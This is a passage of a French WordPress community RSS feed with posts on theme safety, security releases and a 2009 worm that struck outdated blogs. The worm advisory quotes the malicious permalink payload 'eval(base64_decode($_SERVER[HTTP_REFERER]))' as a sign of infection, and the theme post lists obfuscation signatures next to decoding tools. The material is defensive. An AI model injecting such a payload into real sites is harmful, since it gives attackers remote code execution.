<li><a href="http://www.smashingmagazine.com/tag/wordpress/" target="_blank">Smashing Magazine</a></li>
</ul>
<h2>Bons sites avec des thèmes WordPress payants, et quelques-uns gratuits</h2>
<ul>
<li><a href="http://graphpaperpress.com/" target="_blank">Graph Paper Press</a></li>
<li><a href="http://www.woothemes.com/themes/free/" target="_blank">Woo Themes</a></li>
</ul>
<h3>Decodeurs</h3>
<p>Si vous voulez inspecter un thème qui vous semble suspect, voici quelques ressources utiles<strong> </strong>(<a href="http://wordpress.org/support/topic/encrypted-theme-heres-how-to-decode-it" target="_blank">source</a>):</p>
<ul>
<li><code>$o=</code> <a href="http://ottodestruct.com/decoder.php" target="_blank">Le décocdeur d&#8217;Otto </a></li>
<li><code> <a href="http://www.tareeinternet.com/scripts/byterun.php" target="_blank">$_F=__FILE__: </a></code></li>
<li><code> <a href="http://www.tareeinternet.com/scripts/decrypt.php" target="_blank">eval(gzinflate(base64_decode('...')));:</a></code></li>
<li><code> <a href="http://rot13-encoder-decoder.waraxe.us/" target="_blank">eval(str_rot13(' ... '));</a></code></li>
<li><a href="http://cyko.decodethe.net/" target="_blank">Other codes</a></li>
<li><a href="http://wordpress.shadowlantern.com/2009/08/decrypting-footers-base64/" target="_blank">Manual base64 decode</a></li>
</ul>
<h3>Extensions utiles</h3>
<ul>
<li><a href="http://wordpress.org/extend/plugins/tac/" target="_blank">Theme Authenticity Checker</a></li>
<li><a href="http://wordpress.org/extend/plugins/exploit-scanner/" target="_blank">Exploit Scanner</a></li>
<li><a href="http://wordpress.org/extend/plugins/theme-check/" target="_blank">Theme Check</a></li>
</ul>
<h3>A lire (en anglais)</h3>
<ul>
<li><a href="http://www.chipbennett.net/2010/12/10/only-download-wordpress-themes-from-trusted-sources/?doing_wp_cron" target="_blank">Chip Bennett analyse les 30 premiers sites de thèmes sur Google</a></li>
<li><a href="http://ottopress.com/2010/anatomy-of-a-theme-malware/" target="_blank">Otto dissecte les codes malicieux dans les thèmes</a></li>
<li><a href="http://www.themelab.com/2009/12/08/stop-downloading-wordpress-themes-from-shady-sites/" target="_blank">ThemeLab explique pourquoi il ne faut pas télécharger de thèmes en provenance de sites inconnus</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2011/01/26/il-ne-faut-jamais-chercher-un-theme-wordpress-gratuit-sur-un-moteur-de-recherche/feed/</wfw:commentRss>
		<slash:comments>100</slash:comments>
		</item>
		<item>
		<title>L&#8217;hebdo WordPress : Marque WordPress &#8211; Le Campus &#8211; Sécurité</title>
		<link>http://www.wordpress-fr.net/2010/09/14/lhebdo-wordpress-marque-wordpress-le-campus-securite/</link>
		<comments>http://www.wordpress-fr.net/2010/09/14/lhebdo-wordpress-marque-wordpress-le-campus-securite/#comments</comments>
		<pubDate>Tue, 14 Sep 2010 05:17:01 +0000</pubDate>
		<dc:creator>Benoît</dc:creator>
				<category><![CDATA[Astuces]]></category>
		<category><![CDATA[Brèves]]></category>
		<category><![CDATA[Extensions]]></category>
		<category><![CDATA[Livre]]></category>
		<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[Thèmes]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[astuce]]></category>
		<category><![CDATA[blackberry]]></category>
		<category><![CDATA[collectivité]]></category>
		<category><![CDATA[design]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[Hebdo]]></category>
		<category><![CDATA[images]]></category>
		<category><![CDATA[livre]]></category>
		<category><![CDATA[membres]]></category>
		<category><![CDATA[mobile]]></category>
		<category><![CDATA[planet]]></category>
		<category><![CDATA[vitrine]]></category>
		<category><![CDATA[wordpress 3.0]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=1909</guid>
		<description><![CDATA[C&#8217;est un hebdo bien chargé qui vous attend aujourd&#8217;hui&#8230; alors bonne lecture à toutes et à tous. Transfert de la marque WordPress Matt l&#8217;a annoncé cette semaine, cette fois c&#8217;est officiel : la propriété de la marque WordPress a été transférée vers la Fondation WordPress via un don d&#8217;Automattic. Ainsi, elle n&#8217;est plus la propriété [...]]]></description>
			<content:encoded><![CDATA[<p>C&#8217;est un hebdo bien chargé qui vous attend aujourd&#8217;hui&#8230; alors bonne lecture à toutes et à tous.</p>
<h3>Transfert de la marque WordPress</h3>
<p><a href="http://ma.tt/2010/09/wordpress-trademark/">Matt l&#8217;a annoncé cette semaine</a>, cette fois <a href="http://wordpress.org/news/2010/09/trademark-to-wpf/">c&#8217;est officiel</a> : la propriété de <a href="http://wordpressfoundation.org/2010/trademark/">la marque WordPress a été transférée vers la Fondation WordPress</a> via un don d&#8217;Automattic. Ainsi, elle n&#8217;est plus la propriété de cette dernière mais de la fondation à but non lucratif. Ce changement entraine quelques modifications dans les <a href="http://andybeard.eu/3150/warning-wordpress-trademark-now-has-teeth.html">conditions d&#8217;utilisation de la dite marque</a>.</p>
<h3>15 façons d&#8217;intégrer Facebook dans son site web WordPress&#8230; mais pas que !</h3>
<p>Justin Stravarius de chez AppStorm nous propose <a href="http://web.appstorm.net/roundups/social-media-roundups/15-simple-ways-to-integrate-facebook-into-your-website/">15 façons d&#8217;intégrer Facebook dans son site web</a>&#8230; que ce soit WordPress, mais aussi chez la &laquo;&nbsp;concurrence&nbsp;&raquo;. On n&#8217;est pas sectaire chez WordPress Francophone. <img src='http://www.wordpress-fr.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<h3>Un design original</h3>
<p>Des sites sous WordPress peuvent parfois apporter des surprises. <a href="http://www.designmadeingermany.de/magazin/5/">C&#8217;est le cas avec celui-ci</a>. Son design est tout simplement unique et étonnant. Merci <a href="http://twitter.com/Fran6">@Fran6</a> pour le lien.</p>
<h3>WordPress 1.4.3 pour BlackBerry</h3>
<p>Comme chaque semaine, la version mobile en évolution est celle prévue pour les <a href="http://blackberry.wordpress.org/2010/09/07/release-1-4-3/">BlackBerry qui passe en 1.4.3</a>.</p>
<h3>WordPress ouvert qu&#8217;à des membres désignés</h3>
<p>C&#8217;est ce que propose l&#8217;extension <a href="http://wordpress.org/extend/plugins/membership/">WordPress Membership Lite</a>. Votre site devient alors accessible qu&#8217;aux seuls membres choisis et triés sur le volet. Ça fait classe non ? Merci <a href="http://twitter.com/br1o/statuses/23946989942">@br1o</a>.</p>
<h3>Des effets sur les images</h3>
<p>Voici <a href="http://wpmu.org/spice-up-your-wordpress-theme-with-special-effects-on-post-images/">une astuce de WPMU.org</a> pour décorer vos images de manières plus originales que ce qui est prévu.</p>
<h3>Protéger son dossier ../wp-admin/</h3>
<p>Si vous vous êtes déjà posé la question de savoir comment protéger son dossier ../wp-admin/ <a href="http://twigstechtips.blogspot.com/2010/06/wordpress-prevent-access-to-wp-admin.html">voici la solution</a>.</p>
<h3>Les clés de sécurité de WordPress</h3>
<p>Depuis quelques temps maintenant, lors de l&#8217;installation de WordPress, on vous demande d&#8217;enregistrer des clés de sécurité dans le fichier wp-config.php, d&#8217;ailleurs, avec la version 3.0, leur nombre a encore augmenté. Mais savez-vous à quoi elles servent ? <a href="http://digwp.com/2010/09/wordpress-security-keys/">Voici le détail</a>.</p>
<h3>Google Scribe et WordPress</h3>
<p>Cette semaine, outre l&#8217;arrivée de Google Instant, la firme de Mountain View a dévoilé son projet Scribe. Ce dernier permet une auto-complétion des mots d&#8217;une phrase au fur et à mesure de la frappe. Le même principe que Instant mais appliqué au texte au lieu de la recherche. C&#8217;est un peu le mode T9 des mobiles pour l&#8217;internet et la saisie informatique. Sudar de Night Dreaming a réussi adaptation de cette fonction pour les commentaires de WordPress. <a href="http://sudarmuthu.com/blog/2010/09/09/add-google-scribe-to-your-wordpress-blog.html">Il a réalisé une extension qui permet d&#8217;activer ce mode pour la rédaction des commentaires</a> sur votre site.</p>
<h3>La ville de Rive de Gier (42) passe sous WordPress</h3>
<p>Saluons <a href="http://www.rivedegier.fr/">cette collectivité locale</a> qui a fait le choix (et le bon) de migrer son site web officiel sous WordPress. De plus en plus de municipalités se tournent vers cette solution avec raison pour sa souplesse, sa facilité d&#8217;utilisation et sa gestion simplifiée. Bien leur en prend ! Un site qui aura sa place au sein de notre <a href="http://www.wordpress-fr.net/vitrine/">Vitrine </a>dans peu de temps. Un exemple à suivre sans nul doute.</p>
<h3>Le Campus WordPress 3 de chez Pearson, c&#8217;est pour bientôt&#8230;</h3>
<p>Vous avez été nombreux à avoir craqué pour le livre de nos 3 comparses de WordPress Francophone, Xavier, Francis et Amaury : Le Campus WordPress 2.7 aux éditions Pearson. Le 24 septembre, ils remettent ça avec la mise à jour complète du bouquin pour parler de la version 3.0. C&#8217;est <a href="http://twitter.com/xibe/statuses/24020716699">Xavier qui l&#8217;a twitté le 1er</a> ! Le livre est d&#8217;ores et déjà <a href="http://www.amazon.fr/Wordpress-3-Collectif/dp/2744024244/">commandable chez Amazon</a>.<br />
Je rappelle que WordPress Francophone ne touche pas de royalties sur les ventes de ce livre. Seuls sont concernés à titre individuel les 3 auteurs.</p>
<h3>&#8230; et d&#8217;autres suivent le pas</h3>
<p>Comme je le disais au début de cet hebdo, nous ne sommes pas sectaires chez WPFR. Voici donc d&#8217;autres publications à paraitre sur WordPress 3.0 :</p>
<ol>
<li><a href="http://www.amazon.fr/gp/product/2100549960/">Site Web avec WordPress 3.0 : 100 % pratique</a> chez Dunod</li>
<li><a href="http://www.amazon.fr/WordPress-3-pour-blogueur-efficace/dp/2212128290/">WordPress 3 pour le blogueur efficace</a> chez Eyrolles</li>
</ol>
<h3>Une galaxie pas si lointaine</h3>
<p>Geekeries vient de sortir <a href="http://www.geekeries.fr/galaxie">sa galaxie WordPress en français.</a>.. avec le <a href="http://www.wordpress-fr.net/planet/">Planet de WordPress Francophone</a>, il y a donc de quoi avoir la tête dans les étoiles en pensant à WordPress&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2010/09/14/lhebdo-wordpress-marque-wordpress-le-campus-securite/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Mise à jour de sécurité : WordPress 2.8.6</title>
		<link>http://www.wordpress-fr.net/2009/11/12/mise-a-jour-de-securite%c2%a0-wordpress-2-8-6/</link>
		<comments>http://www.wordpress-fr.net/2009/11/12/mise-a-jour-de-securite%c2%a0-wordpress-2-8-6/#comments</comments>
		<pubDate>Thu, 12 Nov 2009 20:28:06 +0000</pubDate>
		<dc:creator>Amaury</dc:creator>
				<category><![CDATA[Brèves]]></category>
		<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=1364</guid>
		<description><![CDATA[La version 2.8.6 corrige 2 problèmes de sécurité pouvant être exploitée par une personne inscrite et connectée qui possèdent la permission de publier. Si votre blog contient des auteurs pas vraiment dignes de confiance, la mise à jour vers la version 2.8.6 est fortement recommandée ! Le premier problème est une vulnérabilité dans la fonction [...]]]></description>
			<content:encoded><![CDATA[<p>La version 2.8.6 corrige 2 problèmes de sécurité pouvant être exploitée par une personne inscrite et connectée qui possèdent la permission de publier. Si votre blog contient des auteurs pas vraiment dignes de confiance, la mise à jour vers la version 2.8.6 est fortement recommandée !</p>
<p>Le premier problème est une vulnérabilité dans la fonction &laquo;&nbsp;Press-Minute&nbsp;&raquo;, elle a été découverte par Benjamin Flesch. Tandis que le second problème, découvert par Dawid Golunski, est une faille avec le formatage des noms de fichiers pouvant être exploité avec certaines configurations Apache. Merci à eux 2 pour la découverte et le report des cas&#8230;</p>
<p>La version française est d&#8217;or et déjà disponible, ainsi que l&#8217;archive ZIP contenant uniquement les fichiers modifiés est <a title="Diff 2.8.5 vers 2.8.6 francisé" href="http://www.wordpress-fr.net/files/2009/11/2.8.6.zip">en version francisé</a>. (Cela vous évitera le message de mise à jour&#8230;)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2009/11/12/mise-a-jour-de-securite%c2%a0-wordpress-2-8-6/feed/</wfw:commentRss>
		<slash:comments>31</slash:comments>
		</item>
		<item>
		<title>Problème de sécurité sur les anciennes versions de WordPress !</title>
		<link>http://www.wordpress-fr.net/2009/09/06/probleme-securite-anciennes-versions-wordpress/</link>
		<comments>http://www.wordpress-fr.net/2009/09/06/probleme-securite-anciennes-versions-wordpress/#comments</comments>
		<pubDate>Sun, 06 Sep 2009 21:35:49 +0000</pubDate>
		<dc:creator>Amaury</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[WordPress Mu]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=1326</guid>
		<description><![CDATA[La nouvelle a fait le tour de la planète, mais il me semble important de faire un point ici&#8230; Les anciennes versions de WordPress ( inférieur à la 2.8.4 ) sont susceptibles d&#8217;être contaminées par un vers (de type worm). Henri du blog 2803, décrit son fonctionnement : &#171;&#160;il simule l&#8217;enregistrement d&#8217;un nouvel utilisateur, utilise [...]]]></description>
			<content:encoded><![CDATA[<p>La nouvelle a fait le tour de la planète, mais il me semble important de faire un point ici&#8230;</p>
<p>Les anciennes versions de WordPress ( inférieur à la 2.8.4 ) sont susceptibles d&#8217;être contaminées par un vers (de type worm). Henri du <a href="http://www.2803.fr/wordpress/important-faites-la-mise-a-jour-de-wordpress-pour-proteger-votre-blog-6749/">blog 2803</a>, décrit son fonctionnement : &laquo;&nbsp;il simule l&#8217;enregistrement d&#8217;un nouvel utilisateur, utilise une faille de sécurité connue, puis se cache avec l&#8217;aide d&#8217;un javascript et enfin intègre du spam et du code malicieux au sein de vos articles.&nbsp;&raquo;</p>
<p>Si votre blog est à jour, en version 2.8.4, vous n&#8217;avez rien à craindre, cette version est immunisée&#8230; Pour les autres, vous devez absolument mettre à jour votre installation.</p>
<h3>Pour mettre à jour.</h3>
<p>La méthode est toujours la même :</p>
<ol>
<li>Sauvegarder les fichiers via votre client FTP</li>
<li>Sauvegarder votre base de données via phpMyAdmin</li>
<li>Désactiver toutes les extensions</li>
<li>Mettre à jour WordPress (via FTP ou mise à jour automatique)</li>
<li>Réactiver les extensions.</li>
</ol>
<h3>Comment savoir si son blog est contaminé ?</h3>
<p>3 choses à vérifier&#8230;</p>
<p><strong>Les permaliens :</strong></p>
<p><code>example.com/category/post-title/%&amp;(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&amp;%/</code>.</p>
<p>Si vos permaliens contiennent le mot &laquo;&nbsp;eval&nbsp;&raquo; ou &laquo;&nbsp;base64_decode&nbsp;&raquo;, vous êtes contaminé.</p>
<p><strong>Les utilisateurs :</strong></p>
<p>Vérifier la liste de vos utilisateurs, si vous êtes le seul administrateur, vous devriez n&#8217;avoir qu&#8217;un seul compte. Si les inscriptions sont ouvertes, vérifier qu&#8217;il n&#8217;y a pas un compte nommé &laquo;&nbsp;Administrator&nbsp;&raquo;</p>
<p>Essayer également la <a href="http://dougal.gunters.org/blog/2009/09/05/checking-your-wordpress-security">requête SQL</a> proposée par Dougal sur son blog. ( <a href="http://dougal.gunters.org/blog/2009/09/05/checking-your-wordpress-security">dougal.gunters.org</a> )</p>
<p><strong>Pour tester votre base d&#8217;articles, exécuter la requête suivante sur votre installation :</strong></p>
<pre>SELECT * FROM wp_posts WHERE post_content LIKE '%&lt;iframe%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%&lt;noscript%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%display:%'</pre>
<p>Si cette requête SQL renvoie des résultats, vous devez nettoyer chacun des articles contaminés&#8230;</p>
<h3>Quelques ressources</h3>
<ul>
<li><a href="http://www.smashingmagazine.com/2009/01/26/10-steps-to-protect-the-admin-area-in-wordpress/">Les 10 étapes pour protéger votre console d&#8217;administration</a>, par Smashing Magazine</li>
<li><a href="http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/">Comment nettoyer complètement une installation WordPress contaminée</a></li>
<li><a href="http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/">Un résumé de la situation et des solutions existantes</a> par Lorelle</li>
</ul>
<p>Le codex traite également du sujet avec la page &laquo;&nbsp;<a href="http://codex.wordpress.org/FAQ_My_site_was_hacked">Comment nettoyer mon installation après un hacking</a>&laquo;&nbsp;.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2009/09/06/probleme-securite-anciennes-versions-wordpress/feed/</wfw:commentRss>
		<slash:comments>36</slash:comments>
		</item>
		<item>
		<title>Sortie de WordPress 2.6.5</title>
		<link>http://www.wordpress-fr.net/2008/11/25/sortie-de-wordpress-265/</link>
		<comments>http://www.wordpress-fr.net/2008/11/25/sortie-de-wordpress-265/#comments</comments>
		<pubDate>Tue, 25 Nov 2008 19:59:19 +0000</pubDate>
		<dc:creator>Benoît</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[version]]></category>
		<category><![CDATA[WordPress 2.6.5]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=860</guid>
		<description><![CDATA[A quelques jours de la sortie de la version 2.7, l&#8217;équipe de développement nous sort une version 2.6.5 de derrière les fagots&#8230; mais aussi de dernière minute ! La sécurité n&#8217;attend pas ! En effet, un problème de sécurité et 3 bugs ont été corrigés sur le tard. Il est fortement conseillé de mettre à [...]]]></description>
			<content:encoded><![CDATA[<p>A quelques jours de la sortie de la version 2.7, l&#8217;<a href="http://wordpress.org/development/2008/11/wordpress-265/">équipe de développement</a> nous sort <a href="http://wordpress.org/wordpress-2.6.5.zip">une version 2.6.5</a> de derrière les fagots&#8230; mais aussi de dernière minute ! La sécurité n&#8217;attend pas !<br />
En effet, un problème de sécurité et 3 bugs ont été corrigés sur le tard. <strong>Il est fortement conseillé de mettre à jour sa copie.</strong></p>
<p>Le correctif concerne une faille de sécurité au niveau du XSS, découverte par Jeremiah Reith. Cette faille concerne seulement les serveurs virtuels IP basés sur Apache 2.x. Ainsi, si seules les corrections vous intéressent, il suffit d&#8217;extraire les 2 fichiers suivants <em>wp-includes/feed.php </em>et <em>wp-includes/version.php</em> du pack de la version 2.6.5&#8230; ou de <a href="http://trac.wordpress.org/changeset?format=zip&amp;new=9878&amp;old=9878&amp;new_path=tags%2F2.6.5&amp;old_path=tags%2F2.6.3">télécharger ce pack tout prêt </a>comprenant les fichiers modifiés.</p>
<p>Cette version 2.6.5 contient 3 autres petites corrections de bugs en plus de la faille ci-dessus. Le premier empêchait accidentellement la sauvegarde des informations meta d&#8217;un article dans la révision. Le deuxième empêchait XML-RPC de rapporter les types de contenus incorrects. <span style="color: #000000;">Le troisième ajout est le formatage des ID utilisateurs lors d&#8217;une requêtes d&#8217;effacements multiples (comme supprimer plusieurs articles d&#8217;un coup par exemple).</span></p>
<p>Il est à noter que la version 2.6.4 est volontairement sautée. On passe directement de la 2.6.3 à la 2.6.5 afin d&#8217;éviter toute confusion avec la fausse version 2.6.4 qui a circulé un temps. <strong>Il n&#8217;y a pas et n&#8217;y aura jamais de WordPress 2.6.4 !</strong></p>
<ul>
<li><a href="http://fr.wordpress.org/release-archive/fr_FR/wordpress-2.6.5-fr_FR.zip">Télécharger WordPress 2.6.5. (version française)</a></li>
<li><a href="http://trac.wordpress.org/changeset?format=zip&amp;new=9878&amp;old=9878&amp;new_path=tags%2F2.6.5&amp;old_path=tags%2F2.6.3">Télécharger le pack des fichiers modifiés</a></li>
</ul>
<p><strong><em><br />
</em></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2008/11/25/sortie-de-wordpress-265/feed/</wfw:commentRss>
		<slash:comments>21</slash:comments>
		</item>
	</channel>
</rss>

